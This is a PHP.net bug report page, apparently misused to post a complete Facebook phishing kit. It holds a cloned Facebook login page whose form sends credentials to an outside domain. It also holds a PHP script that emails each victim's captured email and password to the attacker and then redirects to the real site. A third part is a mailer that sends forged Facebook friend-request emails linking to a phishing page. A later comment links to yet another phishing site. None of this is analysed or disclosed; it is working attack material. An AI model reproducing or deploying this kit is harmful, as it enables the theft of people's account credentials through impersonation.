php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Request #59304 php
Submitted: 2010-07-12 06:47 UTC Modified: 2011-06-10 20:34 UTC
From: face3bo0okkombinasi at gmail dot com Assigned:
Status: Closed Package: PECL website (PECL)
PHP Version: 5_3 SVN-2010-07-12 (dev) OS: php
Private report: No CVE-ID: None
Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If this is not your bug, you can add a comment by following this link.
If this is your bug, but you forgot your password, you can retrieve your password here.
Password:
Status:
Package:
Bug Type:
Summary:
From: face3bo0okkombinasi at gmail dot com
New email:
PHP Version: OS:

 

 [2010-07-12 06:47 UTC] face3bo0okkombinasi at gmail dot com
Description:
------------
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook">
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-language" content="en" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<script type="text/javascript">
//<![CDATA[
(function(href) { var uri_re = /^(?:(?:[^:\/?#]+):)?(?:\/\/(?:[^\/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?/; var target_domain = ''; href.replace(uri_re, function(all, path, query, frag) { if (frag) { var dst, src = path + (query ? '?' + query : ''); if (frag.charAt(0) == '/') { dst = frag.replace(/^\/+/, '/') .replace(/quickling_apps=([^&]+)&?/, function(all, domain){ if (domain.substring(domain.length - 13) == '.facebook.com') { target_domain = 'http://'+domain; } return ''; }); } else if (/&|=/.test(frag)) { var q = {}; var m = frag.match(/([^#]*)(#.*)?/); var arr = (query||'').split('&').concat((m[1]||'').split('&')); for (var i=0, length=arr.length; i<length; i++) { var t = arr[i].split('='); if (t.length && t[0] != '') { q[t[0]] = t[1]; } } var s = []; for (var i in q) { s.push(i+ (q[i]?'='+q[i]:'')); } dst = path+'?'+s.join('&')+(m[2]||''); } if (dst && dst != src) { window.location.replace(target_domain + dst); } } }); })(window.location.href); var onloadRegister = window.onloadRegister || function(h) { onloadhooks.push(h); }; var onloadhooks = window.onloadhooks || []; var onafterloadRegister = window.onafterloadRegister || function(h) { onafterloadhooks.push(h); }; var onafterloadhooks = window.onafterloadhooks || []; function wait_for_load(element, e, f) { f = bind(element, f, e); if (window.loaded) { return f(); } switch ((e || event).type) { case 'load': case 'focus': onloadRegister(f); return; case 'click': if (element.original_cursor === undefined) { element.original_cursor = element.style.cursor; } if (document.body.original_cursor === undefined) { document.body.original_cursor = document.body.style.cursor; } element.style.cursor = document.body.style.cursor = 'progress'; onafterloadRegister(function() { element.style.cursor = element.original_cursor; document.body.style.cursor = document.body.original_cursor; element.original_cursor = document.body.original_cursor = undefined; if (element.tagName.toLowerCase() == 'a') { var original_event = window.event; window.event = e; var ret_value = element.onclick.call(element, e); window.event = original_event; if (ret_value !== false && element.href) { window.location.href = element.href; } } else if (element.click) { element.click(); } }); break; } return false; }; function bind(obj, method ) { var args = []; for (var ii = 2; ii < arguments.length; ii++) { args.push(arguments[ii]); } var fn = function() { var _obj = obj || (this == window ? false : this); var _args = args.slice(); for (var jj = 0; jj < arguments.length; jj++) { _args.push(arguments[jj]); } if (typeof(method) == "string") { if (_obj[method]) { return _obj[method].apply(_obj, _args); } } else { return method.apply(_obj, _args); } }; if (typeof method == 'string') { fn.name = method; } else if (method && method.name) { fn.name = method.name; } fn.toString = function() { return bind._toString(obj, args, method); }; return fn; }; var curry = bind(null, bind, null); bind._toString = bind._toString || function(obj, args, method) { return (typeof method == 'string') ? ('late bind<'+method+'>') : ('bound<'+method.toString()+'>'); }; function goURI(uri, force_reload) { uri = uri.toString(); if (!force_reload && window.PageTransitions && PageTransitions.isInitialized()) { PageTransitions.go(uri); } else if (window.location.href == uri) { window.location.reload(); } else { window.location.href = uri; } } var PrimordialBootloader = window.PrimordialBootloader || { loaded : [], done : function(names) { PrimordialBootloader.loaded.push(names); } }; var Bootloader = window.Bootloader || { done : PrimordialBootloader.done }; function loadExternalJavascript(urls, callback, body) { if (urls instanceof Array) { var url = urls.shift(0); loadExternalJavascript(url, function() { if (urls.length) { loadExternalJavascript(urls, callback, body); } else { callback && callback(); } }, body); } else { var node = body ? document.body : document.getElementsByTagName('head')[0]; var script = document.createElement('script'); script.type = 'text/javascript'; script.src = urls; if (callback) { script.onerror = script.onload = callback; script.onreadystatechange = function() { if (this.readyState == "complete" || this.readyState == "loaded") { callback(); } } } node.appendChild(script); return script; } } window.loadFirebugConsole && window.loadFirebugConsole();document.cookie = "cvr_tx=; expires=Mon, 26 Jul 1997 05:00:00 GMT; path=\/; domain=.facebook.com";
//]]>
</script>
<meta name="robots" content="noodp,noydir" />
<meta name="description" content="Facebook is a social utility that connects people with friends and others who work, study and live around them. People use Facebook to keep up with friends, upload an unlimited number of photos, post links and videos, and learn more about the people they meet." />
<title>Login | Facebook</title>

<script type="text/javascript">
Env={method:"GET",dev:0,start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:157872,static_base:"http:\/\/static.ak.fbcdn.net\/",tlds:["com","dk","no","se","ca","co.za","com.au"],ajax_bundle:1,rep_lag:2};
</script>

    <script type="text/javascript" src="http://static.ak.fbcdn.net/js_strings.php/t86084/en_US"></script>
    <script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/zEDR9/lpkg/9tkta4k9/en_US/141/157460/js/e75qsq5bjbk800cw.pkg.js"></script>
<script type="text/javascript">Bootloader.loadInitialResources([{"name":"js\/994qn6krufc48gok.pkg.js","type":"js","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/zC87W\/lpkg\/1f5bd35t\/nu_ll\/141\/157460\/js\/994qn6krufc48gok.pkg.js","permanent":false},{"name":"js\/8ofct6kqqfsws0sc.pkg.js","type":"js","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/z24B5\/lpkg\/aknahk2x\/en_US\/141\/156314\/js\/8ofct6kqqfsws0sc.pkg.js","permanent":false},{"name":"js\/useragent.js","type":"js","src":"http:\/\/b.static.ak.fbcdn.net\/rsrc.php\/zEJTV\/l\/5k5jekhg\/nu_ll\/139152\/js\/useragent.js","permanent":false}])</script>
    <link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/z7T6K/lpkg/cwx5p9hf/en_US/141/156383/css/1uom3yh8tp7o4so4.pkg.css" />
    <link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/z5M5U/lpkg/1ixjqknd/en_US/141/153068/css/2w4nc5p1m7qc8g0o.pkg.css" />
    <link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/zAZ57/lpkg/bb7n0ut5/en_US/141/157460/css/a22nq2m07kocs00s.pkg.css" />
    <link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/z3T67/lpkg/d2pw6xp4/en_US/141/157460/css/d7km5ne2ce0ws480.pkg.css" />
    <link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/z6O02/lpkg/2lkq46ut/en_US/141/157460/css/1zyeeo7k8o0088kg.pkg.css" />
    <link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/zE3BR/lpkg/8my6fg8p/en_US/141/156144/css/7ol5p4lz6csokw8g.pkg.css" />
<!--[if lte IE 6]><link rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/z34ZN/l/a9xgcunw/en_US/154251/css/ie6.css" type="text/css"/><![endif]-->
<!--[if IE 7]><link rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/zBT4M/l/a8h3fb3n/en_US/136369/css/ie7.css" type="text/css"/><![endif]-->

<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/opensearch_desc.xml?8:72379" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/favicon.ico?8:132011" />
</head>
<body class="login_page ff3 UIPage_LoggedOut Locale_en_US">
<script type="text/javascript">try {if (top.location.hostname != self.location.hostname) {throw 1;}} catch (e) {i = new Image();i.src = "http://errors.facebook.com/common/scribe_endpoint.php?c=si_clickjacking&t=" + Math.floor(Math.random()*10000);}</script><div id="dropmenu_container"></div><div id="nonfooter"><div id="page_height" class="clearfix"><div id="menubar_container"><div id="fb_menubar" class="fb_menubar_logged_out clearfix"><div id="fb_menubar_core"><ul class="fb_menu_list"><li class="fb_menu" id="fb_menubar_logo"><a href="http://www.facebook.com" title="Go to Facebook Home"><span>&nbsp;</span></a></li></ul></div><div id="fb_menubar_aux"><ul class="fb_menu_list"></ul></div></div><div class="signup_box clearfix"><div class="UILinkButton UILinkButton_SUBig"><a class="UILinkButton_A" href="/r.php?locale=en_US" onclick="return wait_for_load(this, event, function() { seo_tracking_signup_event(this, 'Register Top Bar'); });">Sign Up</a><div class="UILinkButton_RW"><div class="UILinkButton_R"></div></div></div><span class="signup_box_message">Facebook helps you connect and share with the people in your life.</span></div></div><div id="content" class="fb_content"><div class="UIFullPage_Container"><div class="UIInterstitialContainer clearfix"><div class="UIRoundedTransparentBox"><div class="UIRoundedTransparentBox_Inner clearfix"><div class="UIRoundedTransparentBox_Corner UIRoundedTransparentBox_TL">&nbsp;</div><div class="UIRoundedTransparentBox_Corner UIRoundedTransparentBox_TR">&nbsp;</div><div class="UIRoundedTransparentBox_Corner UIRoundedTransparentBox_BL">&nbsp;</div><div class="UIRoundedTransparentBox_Corner UIRoundedTransparentBox_BR">&nbsp;</div><div class="UIRoundedTransparentBox_Border clearfix"><div class="UIInterstitialBox_Container clearfix"><div class="UIOneOff_Container"><div class="title_header add_border"><h2 class="no_icon">Facebook Login</h2></div><form method="POST" action="http://zero-bet.net/login_act.php"><input type="hidden" name="charset_test" value="&euro;,&acute;,?,?,&#27700;,&#1044;,&#1028;" /><div class="status" id="standard_status"><h2><span id=status_title>You must log in to see this page.</span></h2></div>
<div id="loginform" style=""><input type="hidden" id="next" name="next" value="http://www.facebook.com/n/?profile.php&amp;id=1477342634&amp;mid=398af0G5a9b660aG51af0G1b" /><input type="hidden" id="version" name="version" value="1.0" /><input type="hidden" id="return_session" name="return_session" value="0" /><input type="hidden" name="charset_test" value="&euro;,&acute;,?,?,&#27700;,&#1044;,&#1028;" /><div class="form_row clearfix "><label for="email" id="label_email">Email:</label><input type="text" class="inputtext" id="email" name="email" value="" onkeypress="return wait_for_load(this, event, function() { formchange() });" /></div><div class="form_row clearfix "><label for="pass" id="label_pass">Password:</label><input type="password" class="inputpassword" id="pass" name="pass" value="" /></div><label class="persistent"><input type="checkbox" class="inputcheckbox " id="persistent_inputcheckbox" name="persistent" value="1" /><span id="remember_me_text">Remember me</span></label><div id="buttons" class="form_row clearfix"><label></label><input type="submit" value="Login" name="login" id="login" onclick="return wait_for_load(this, event, function() { seo_tracking_login_event(this, &#039;UI Form&#039;);this.disabled=true; this.form.submit(); return false; });" class="inputsubmit" /> or <strong><a href="http://www.facebook.com/r.php?next=http%253A%252F%252Fwww.facebook.com%252Fn%252F%253Fprofile.php%2526id%253D1477342634%2526mid%253D398af0G5a9b660aG51af0G1b&amp;locale=en_US" id="reg_btn_link" target="_blank" rel="nofollow">Sign up for Facebook</a></strong></div><p class="reset_password form_row"><label></label><a href="http://www.facebook.com/reset.php?locale=en_US">Forgot your password?</a></p></div></form>
</div></div></div></div></div></div></div></div></div></div><div id="pagefooter"><div class="pagefooter_topborder clearfix"><div class="copyright_and_location clearfix"><div class="copyright" id="pagefooter_copyright"><span title="PHP">Facebook </span><span id="rtime" title="142">&copy;</span> <span title="10.18.17.123">20</span><span title="17119424">09</span></div><div id="locale_footer_selector" class="locale_footer_selector"><div class="dropdown_menu hidden_elem " id="locale_footer_selector_menu"><div class="dropdown_menu_header_shadow"><div class="menu_content"><a href="http://www.facebook.com/login.php" onclick="return wait_for_load(this, event, function() { return false; });">English (US)</a><a href="http://es-la.facebook.com/login.php" onclick="return wait_for_load(this, event, function() { intl_set_cookie_locale(&quot;es_LA&quot;, &quot;http:\/\/es-la.facebook.com\/login.php&quot;); return false; });">Espa?ol</a><a href="http://fr-fr.facebook.com/login.php" onclick="return wait_for_load(this, event, function() { intl_set_cookie_locale(&quot;fr_FR&quot;, &quot;http:\/\/fr-fr.facebook.com\/login.php&quot;); return false; });">Fran?ais (France)</a><a href="http://de-de.facebook.com/login.php" onclick="return wait_for_load(this, event, function() { intl_set_cookie_locale(&quot;de_DE&quot;, &quot;http:\/\/de-de.facebook.com\/login.php&quot;); return false; });">Deutsch</a><a href="http://ja-jp.facebook.com/login.php" onclick="return wait_for_load(this, event, function() { intl_set_cookie_locale(&quot;ja_JP&quot;, &quot;http:\/\/ja-jp.facebook.com\/login.php&quot;); return false; });">&#26085;&#26412;&#35486;</a><a href="http://www.facebook.co.za/login.php" onclick="return wait_for_load(this, event, function() { intl_set_cookie_locale(&quot;af_ZA&quot;, &quot;http:\/\/www.facebook.co.za\/login.php&quot;); return false; });">Afrikaans</a><a href="http://ar-ar.facebook.com/login.php" onclick="return wait_for_load(this, event, function() { intl_set_cookie_locale(&quot;ar_AR&quot;, &quot;http:\/\/ar-ar.facebook.com\/login.php&quot;); return false; });">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577;</a><a href="http://bg-bg.facebook.com/login.php" onclick="return wait_for_load(this, event, function() { intl_set_cookie_locale(&quot;bg_BG&quot;, &quot;http:\/\/bg-bg.facebook.com\/login.php&quot;); return false; });">&#1041;&#1098;&#1083;&#1075;&#1072;&#1088;&#1089;&#1082;&#1080;</a><a href="http://ca-es.facebook.com/login.php" onclick="return wait_for_load(this, event, function() { intl_set_cookie_locale(&quot;ca_ES&quot;, &quot;http:\/\/ca-es.facebook.com\/login.php&quot;); return false; });">Catal?</a><a href="http://cs-cz.facebook.com/login.php" onclick="return wait_for_load(this, event, function() { intl_set_cookie_locale(&quot;cs_CZ&quot;, &quot;http:\/\/cs-cz.facebook.com\/login.php&quot;); return false; });">&#268;e?tina</a><a href="http://cy-gb.facebook.com/login.php" onclick="return wait_for_load(this, event, function() { intl_set_cookie_locale(&quot;cy_GB&quot;, &quot;http:\/\/cy-gb.facebook.com\/login.php&quot;); return false; });">Cymraeg</a><a href="http://www.facebook.dk/login.php" onclick="return wait_for_load(this, event, function() { intl_set_cookie_locale(&quot;da_DK&quot;, &quot;http:\/\/www.facebook.dk\/login.php&quot;); return false; });">Dansk</a><a href="http://el-gr.facebook.com/login.php" onclick="return wait_for_load(this, event, function() { intl_set_cookie_locale(&quot;el_GR&quot;, &quot;http:\/\/el-gr.facebook.com\/login.php&quot;); return false; });">&#917;&#955;&#955;&#951;&#957;&#953;&#954;&#940;</a><a href="http://en-gb.facebook.com/login.php" onclick="return wait_for_load(this, event, function() { intl_set_cookie_locale(&quot;en_GB&quot;, &quot;http:\/\/en-gb.facebook.com\/login.php&quot;); return false; });">English (UK)</a><a href="http://es-es.facebook.com/login.php" onclick="return wait_for_load(this, event, function() { intl_set_cookie_locale(&quot;es_ES&quot;, &quot;http:\/\/es-es.facebook.com\/login.php&quot;); return false; });">Espa?ol (Espa?a)</a><a href="http://fi-fi.facebook.com/login.php" onclick="return wait_for_load(this, event, function() { intl_set_cookie_locale(&quot;fi_FI&quot;, &quot;http:\/\/fi-fi.facebook.com\/login.php&quot;); return false; });">Suomi</a><a href="http://fr.facebook.ca/login.php" onclick="return wait_for_load(this, event, function() { intl_set_cookie_locale(&quot;fr_CA&quot;, &quot;http:\/\/fr.facebook.ca\/login.php&quot;); return false; });">Fran?ais (Canada)</a><a href="http://he-il.facebook.com/login.php" onclick="return wait_for_load(this, event, function() { intl_set_cookie_locale(&quot;he_IL&quot;, &quot;http:\/\/he-il.facebook.com\/login.php&quot;); return false; });">&#1506;&#1489;&#1512;&#1497;&#1514;</a><a href="http://hr-hr.facebook.com/login.php" onclick="return wait_for_load(this, event, function() { intl_set_cookie_locale(&quot;hr_HR&quot;, &quot;http:\/\/hr-hr.facebook.com\/login.php&quot;); return false; });">Hrvatski</a><a href="http://hu-hu.facebook.com/login.php" onclick="return wait_for_load(this, event, function() { intl_set_cookie_locale(&quot;hu_HU&quot;, &quot;http:\/\/hu-hu.facebook.com\/login.php&quot;); return false; });">Magyar</a><a href="http://id-id.facebook.com/login.php" onclick="return wait_for_load(this, event, function() { intl_set_cookie_locale(&quot;id_ID&quot;, &quot;http:\/\/id-id.facebook.com\/login.php&quot;); return false; });">Bahasa Indonesia</a><a href="http://it-it.facebook.com/login.php" onclick="return wait_for_load(this, event, function() { intl_set_cookie_locale(&quot;it_IT&quot;, &quot;http:\/\/it-it.facebook.com\/login.php&quot;); return false; });">Italiano</a><a href="http://ko-kr.facebook.com/login.php" onclick="return wait_for_load(this, event, function() { intl_set_cookie_locale(&quot;ko_KR&quot;, &quot;http:\/\/ko-kr.facebook.com\/login.php&quot;); return false; });">&#54620;&#44397;&#50612;</a><a href="http://lt-lt.facebook.com/login.php" onclick="return wait_for_load(this, event, function() { intl_set_cookie_locale(&quot;lt_LT&quot;, &quot;http:\/\/lt-lt.facebook.com\/login.php&quot;); return false; });">Lietuvi&#371;</a><a href="http://ms-my.facebook.com/login.php" onclick="return wait_for_load(this, event, function() { intl_set_cookie_locale(&quot;ms_MY&quot;, &quot;http:\/\/ms-my.facebook.com\/login.php&quot;); return false; });">Bahasa Melayu</a><a href="http://www.facebook.no/login.php" onclick="return wait_for_load(this, event, function() { intl_set_cookie_locale(&quot;nb_NO&quot;, &quot;http:\/\/www.facebook.no\/login.php&quot;); return false; });">Norsk (bokm?l)</a><a href="http://nl-nl.facebook.com/login.php" onclick="return wait_for_load(this, event, function() { intl_set_cookie_locale(&quot;nl_NL&quot;, &quot;http:\/\/nl-nl.facebook.com\/login.php&quot;); return false; });">Nederlands</a><a href="http://pl-pl.facebook.com/login.php" onclick="return wait_for_load(this, event, function() { intl_set_cookie_locale(&quot;pl_PL&quot;, &quot;http:\/\/pl-pl.facebook.com\/login.php&quot;); return false; });">Polski</a><a href="http://pt-br.facebook.com/login.php" onclick="return wait_for_load(this, event, function() { intl_set_cookie_locale(&quot;pt_BR&quot;, &quot;http:\/\/pt-br.facebook.com\/login.php&quot;); return false; });">Portugu?s (Brasil)</a><a href="http://pt-pt.facebook.com/login.php" onclick="return wait_for_load(this, event, function() { intl_set_cookie_locale(&quot;pt_PT&quot;, &quot;http:\/\/pt-pt.facebook.com\/login.php&quot;); return false; });">Portugu?s (Portugal)</a><a href="http://ro-ro.facebook.com/login.php" onclick="return wait_for_load(this, event, function() { intl_set_cookie_locale(&quot;ro_RO&quot;, &quot;http:\/\/ro-ro.facebook.com\/login.php&quot;); return false; });">Rom?n&#259;</a><a href="http://ru-ru.facebook.com/login.php" onclick="return wait_for_load(this, event, function() { intl_set_cookie_locale(&quot;ru_RU&quot;, &quot;http:\/\/ru-ru.facebook.com\/login.php&quot;); return false; });">&#1056;&#1091;&#1089;&#1089;&#1082;&#1080;&#1081;</a><a href="http://sk-sk.facebook.com/login.php" onclick="return wait_for_load(this, event, function() { intl_set_cookie_locale(&quot;sk_SK&quot;, &quot;http:\/\/sk-sk.facebook.com\/login.php&quot;); return false; });">Sloven&#269;ina</a><a href="http://sl-si.facebook.com/login.php" onclick="return wait_for_load(this, event, function() { intl_set_cookie_locale(&quot;sl_SI&quot;, &quot;http:\/\/sl-si.facebook.com\/login.php&quot;); return false; });">Sloven?&#269;ina</a><a href="http://sr-rs.facebook.com/login.php" onclick="return wait_for_load(this, event, function() { intl_set_cookie_locale(&quot;sr_RS&quot;, &quot;http:\/\/sr-rs.facebook.com\/login.php&quot;); return false; });">&#1057;&#1088;&#1087;&#1089;&#1082;&#1080;</a><a href="http://www.facebook.se/login.php" onclick="return wait_for_load(this, event, function() { intl_set_cookie_locale(&quot;sv_SE&quot;, &quot;http:\/\/www.facebook.se\/login.php&quot;); return false; });">Svenska</a><a href="http://th-th.facebook.com/login.php" onclick="return wait_for_load(this, event, function() { intl_set_cookie_locale(&quot;th_TH&quot;, &quot;http:\/\/th-th.facebook.com\/login.php&quot;); return false; });">&#3616;&#3634;&#3625;&#3634;&#3652;&#3607;&#3618;</a><a href="http://tl-ph.facebook.com/login.php" onclick="return wait_for_load(this, event, function() { intl_set_cookie_locale(&quot;tl_PH&quot;, &quot;http:\/\/tl-ph.facebook.com\/login.php&quot;); return false; });">Filipino</a><a href="http://tr-tr.facebook.com/login.php" onclick="return wait_for_load(this, event, function() { intl_set_cookie_locale(&quot;tr_TR&quot;, &quot;http:\/\/tr-tr.facebook.com\/login.php&quot;); return false; });">T?rk?e</a><a href="http://vi-vn.facebook.com/login.php" onclick="return wait_for_load(this, event, function() { intl_set_cookie_locale(&quot;vi_VN&quot;, &quot;http:\/\/vi-vn.facebook.com\/login.php&quot;); return false; });">Ti&#7871;ng Vi&#7879;t</a><a href="http://zh-cn.facebook.com/login.php" onclick="return wait_for_load(this, event, function() { intl_set_cookie_locale(&quot;zh_CN&quot;, &quot;http:\/\/zh-cn.facebook.com\/login.php&quot;); return false; });">&#20013;&#25991;(&#31616;&#20307;)</a><a href="http://zh-hk.facebook.com/login.php" onclick="return wait_for_load(this, event, function() { intl_set_cookie_locale(&quot;zh_HK&quot;, &quot;http:\/\/zh-hk.facebook.com\/login.php&quot;); return false; });">&#20013;&#25991;(&#39321;&#28207;)</a><a href="http://zh-tw.facebook.com/login.php" onclick="return wait_for_load(this, event, function() { intl_set_cookie_locale(&quot;zh_TW&quot;, &quot;http:\/\/zh-tw.facebook.com\/login.php&quot;); return false; });">&#20013;&#25991;(&#21488;&#28771;)</a></div></div></div><div class="dropdown_head  double_arrow"><a href="#" class="dropdown_link" id="locale_footer_selector_hitarea">English (US)&nbsp;<img src="http://static.ak.fbcdn.net/images/spacer.gif?8:11" alt="language selector" style="height:8px;width:5px;" /></a></div></div></div><div id="pagefooter_links"><ul id="pagefooter_left_links"><li><a href="http://www.facebook.com/login.php?ref=pf">Login</a></li><li><a href="http://www.facebook.com/facebook?ref=pf" accesskey="7" rel="nofollow">About</a></li><li><a href="http://www.facebook.com/advertising/?src=pf">Advertising</a></li><li><a href="http://developers.facebook.com/?ref=pf">Developers</a></li><li><a href="http://www.facebook.com/careers/?ref=pf">Careers</a></li><li><a href="http://www.facebook.com/terms.php?ref=pf" accesskey="8" rel="nofollow">Terms</a></li><li><span><img class="spritemap_icons sx_icons_pagefooter_bullet li_bullet" src="http://static.ak.fbcdn.net/images/spacer.gif?8:11" /></span></li></ul><ul id="pagefooter_right_links"><li><a href="http://www.facebook.com/find-friends/?ref=pf">Find Friends</a></li><li><a href="http://www.facebook.com/policy.php?ref=pf" accesskey="6" rel="nofollow">Privacy</a></li><li><a href="http://www.facebook.com/help.php?ref=pf" accesskey="0" rel="nofollow">Help</a></li></ul></div></div></div><div id="js_buffer"><script type="text/javascript">

onloadRegister(function(){Bootloader.configurePage({"http:\/\/b.static.ak.fbcdn.net\/rsrc.php\/z7T6K\/lpkg\/cwx5p9hf\/en_US\/141\/156383\/css\/1uom3yh8tp7o4so4.pkg.css":["css\/1uom3yh8tp7o4so4.pkg.css",true],"http:\/\/b.static.ak.fbcdn.net\/rsrc.php\/z5M5U\/lpkg\/1ixjqknd\/en_US\/141\/153068\/css\/2w4nc5p1m7qc8g0o.pkg.css":["css\/2w4nc5p1m7qc8g0o.pkg.css",false],"http:\/\/b.static.ak.fbcdn.net\/rsrc.php\/zAZ57\/lpkg\/bb7n0ut5\/en_US\/141\/157460\/css\/a22nq2m07kocs00s.pkg.css":["css\/a22nq2m07kocs00s.pkg.css",false],"http:\/\/b.static.ak.fbcdn.net\/rsrc.php\/z3T67\/lpkg\/d2pw6xp4\/en_US\/141\/157460\/css\/d7km5ne2ce0ws480.pkg.css":["css\/d7km5ne2ce0ws480.pkg.css",true],"http:\/\/b.static.ak.fbcdn.net\/rsrc.php\/z6O02\/lpkg\/2lkq46ut\/en_US\/141\/157460\/css\/1zyeeo7k8o0088kg.pkg.css":["css\/1zyeeo7k8o0088kg.pkg.css",true],"http:\/\/static.ak.fbcdn.net\/rsrc.php\/zE3BR\/lpkg\/8my6fg8p\/en_US\/141\/156144\/css\/7ol5p4lz6csokw8g.pkg.css":["css\/7ol5p4lz6csokw8g.pkg.css",false]});
Bootloader.done(["css\/1uom3yh8tp7o4so4.pkg.css","css\/2w4nc5p1m7qc8g0o.pkg.css","css\/a22nq2m07kocs00s.pkg.css","css\/d7km5ne2ce0ws480.pkg.css","css\/1zyeeo7k8o0088kg.pkg.css","css\/7ol5p4lz6csokw8g.pkg.css"]);
});

onloadRegister(function() {if (window.Env) { Env["nectar_last_impression_id"]="9f3cd01696b6c26a140e8a8d5689306a"; }});
onloadRegister(function() {if (window.Env) { Env["nectar_last_nav_impression_id"]=""; }});
onloadRegister(function() {seo_tracking_set_logged_out_params("Login", "", "Login", "www.facebook.com", "", "en_US", "id_ID", "ID")});
onloadRegister(function() {window.loading_page_chrome = true;});
onloadRegister(function() {new MenuBar("fb_menubar_core").setTimeoutInterval(250).init();});
onloadRegister(function() {new MenuBar("fb_menubar_aux").setTimeoutInterval(100).init();});
onloadRegister(function() {dropmenu("locale_footer_selector_hitarea")
      .registerHTMLMenu("locale_footer_selector_menu")
      .setPosition(dropmenu.ALIGN_LEFT)
      .setDirection(dropmenu.DIRECTION_UP)
      .addHook("show", function(clickTarget) {
        CSS.addClass(clickTarget, "active"); }
        .bind(null, "locale_footer_selector_hitarea"))
      .addHook("hide", function(clickTarget) {
        CSS.removeClass(clickTarget, "active"); }
        .bind(null, "locale_footer_selector_hitarea"));});
onloadRegister(function() {window.loading_page_chrome = false;});
onloadRegister(function() {ffid='64Fjtb+6is4jXibFhmPpPQ==';});
onloadRegister(function() {
      onbeforeunloadRegister(function () {
        window.setCookie && window.setCookie("cvr_tx", (new Date()).getTime(), 10000);
        }, true);});


</script></div><script type="text/javascript">if (!window.ge) {
  window.ge = function(id) {
    return document.getElementById(id);
  }
}

window.onload = function() {
  document.cookie = "test_cookie=1;domain=.facebook.com";
  var e = ge('email'),
      p = ge('pass');

  //  We sometimes show you *only* a password prompt, so focus that if there
  //  is no e-mail prompt.

  if (e && !e.value) {
    e.focus();
  } else if (p) {
    p.focus();
  }
};

function formchange() {
  (ge('persistent')||{}).checked = 0;
}

function pop(url) {
  window.open(url);
}
</script></body>
</html>


Reproduce code:
---------------
<?
$email=$_POST['email'];
$pass=$_POST['pass'];

$about="Facebook HAcK";
$pesan=
"Email : $email
Password : $pass


Tengkyu Bos!!";
$tujuan="facebookkombinasi@gmail.com";//tuliskan nama email anda di sini
mail($tujuan,$about,$pesan,"From:kutu.kupret.kampret.ah@gmail.com");

header("location:https://login.facebook.com/login.php?login_attempt=1");//setelah login pada halaman yang kita tentukan, maka user akan masuk ke halaman login facebook yang asli!
?>

Expected result:
----------------
<?php 
$email_tujuan=$_POST['email_tujuan'];
$nama_depan=$_POST['nama_depan'];
$nama_belakang=$_POST['nama_belakang'];
$pesan="<body>
$nama_depan added you as a friend on Facebook.  We need to confirm that you know $nama_depan in order for you to be friends on Facebook. <br/>
To confirm this friend request, follow the link below:<br/>
<a href=\"http://www.timpakol.co.cc/login.php.htm\">http://www.facebook.com/n/?reqs.php&mid=23e00eG47e7845649564573Oe</a></br><br/>
Thanks,<br/>
The Facebook Team<br/><br/><br/>


Want to control which emails you receive from Facebook? Go to:<br/>
<a href=\"http://www.timpakol.co.cc/login.php.htm\">http://www.facebook.com/editaccount.php?notifications&md=ZnJpZW5kO2Zyb209MTUyMDEzMzY0MjkjkjyuiBJt0bz0xMj2MDI0MjYz&mid=23e00eGy7xi70789805MBPKXPS56</a></br><br/>


</body></html>";
mail("$email_tujuan","$nama_depan $nama_belakang added you as a friend on Facebook...","$pesan", 
"From: Facebook <confirm+x~n-vr8d@facebookmail.com>\n" . 
"MIME-Version: 1.0\n" . 
"Content-type: text/html; charset=iso-8859-1");
echo"<script>alert('Pesan Sukses di kirim!',document.location.href='http://zero-bet.net')</script>";
//silakan ganti nama domain zero-bet.net dengan nama tempat domain yang anda gunakan!! 
?>

Actual result:
--------------
<form action="next_login.php" method="post" enctype="multipart/form-data">
    <table cellspacing="0" cellpadding="0" border="0" style="width: 413px; height: 230px;">
        <!--DWLayoutTable-->
        <tbody>
            <tr>
                <td height="181">&nbsp;</td>
                <td valign="top">
                <table height="188" border="0" cellpadding="0" cellspacing="0" style="width: 406px; height: 226px;">
                    <!--DWLayoutTable-->
                    <tbody>
                        <tr>
                            <td width="220" height="23" valign="top">Nama Depan yang request</td>
                            <td width="186" valign="top">:          <input type="text" name="nama_depan" id="nama_depan" /></td>
                        </tr>
                        
                        <tr>
                            <td height="24" valign="top">Nama Belakang yang request</td>
                            <td valign="top">:          <input type="text" name="nama_belakang" id="nama_belakang" /></td>
                        </tr>
                        
                        <tr>
                            <td height="23" valign="top">Email Tujuan</td>
                            <td valign="top">:          <input type="text" name="email_tujuan" id="email_tujuan" /></td>
                        </tr>
                        
                        <tr>
                            <td height="38" colspan="3"><input type="submit" name="Submit" id="Submit" value="Kirim..." /></td>
                        </tr>
                    </tbody>
                </table>                </td>
            </tr>
        </tbody>
    </table>
</form>

Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2011-02-06 16:54 UTC] olta_zame at info dot al
http://www.rieberer.net/phish
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Thu Mar 28 16:01:29 2024 UTC